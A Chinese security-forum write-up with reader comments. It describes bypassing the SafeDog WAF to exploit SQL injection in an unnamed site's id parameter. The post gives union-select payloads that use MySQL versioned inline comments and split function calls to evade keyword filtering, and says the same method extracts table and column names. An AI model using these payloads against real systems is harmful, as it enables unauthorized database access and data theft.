论一次挖洞绕WAF经历

ZKAQ-枫   ·   发表于 2021-10-05 20:57:00   ·   漏洞文章

首先进入存在SQL注入的漏洞页面

然后尝试id=123-1

页面跳转说明存在SQL注入

然后进行联合查询

发现被安全狗拦截了

经过尝试发现 union 或者 select 单独用不会被拦截,但是同时出现会被拦截
所以我这里通过抓包加跑包发现10044版本可以绕过

然后成功地测试出了字段数和显错位了

?id=123 union /!10044select/ 1,2,3,4,5,6

获取库名的时候还是被拦截,发现是select 和 database()一起出现的时候会被拦截

然后我使用切割字符串+内联注释的方法进行绕过并且成功绕过

id=123 union /!10044select/ 1,substr(/!database//(//)/,1,10),3,4,5,6

同理表名以及字段名也是以上方法获取

本人萌新,如果有什么好的方法或者建议请各位大佬多多指点

用户名金币积分时间理由
奖励系统 50.00 0 2021-12-14 09:09:35 投稿满 5 赞奖励
Track-劲夫 5.00 0 2021-10-11 14:02:21 一个受益终生的帖子~~
Track-JARVIS 5.00 0 2021-10-11 11:11:43 一个受益终生的帖子~~
Track-聂风 35.00 0 2021-10-09 14:02:10 一个受益终生的帖子~~

打赏我,让我更有动力~

5 条回复   |  直到 2021-12-10 | 1517 次浏览

kingboy007
发表于 2021-10-15

请问加10044是什么原理啊

评论列表

  • 加载数据中...

编写评论内容

askes24
发表于 2021-10-15

我也想说加10044是什么原理啊,怎么查看的

评论列表

  • 加载数据中...

编写评论内容

nineone
发表于 2021-10-18

hxd,切割字符串什么原理啊
有点看不懂

评论列表

  • 加载数据中...

编写评论内容

NinoWEI
发表于 2021-10-9

老哥问一下union 或者 select 怎么单独测试。单独测试的语句是什么

评论列表

  • 加载数据中...

编写评论内容

a1287074202
发表于 2021-12-10

学习了

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.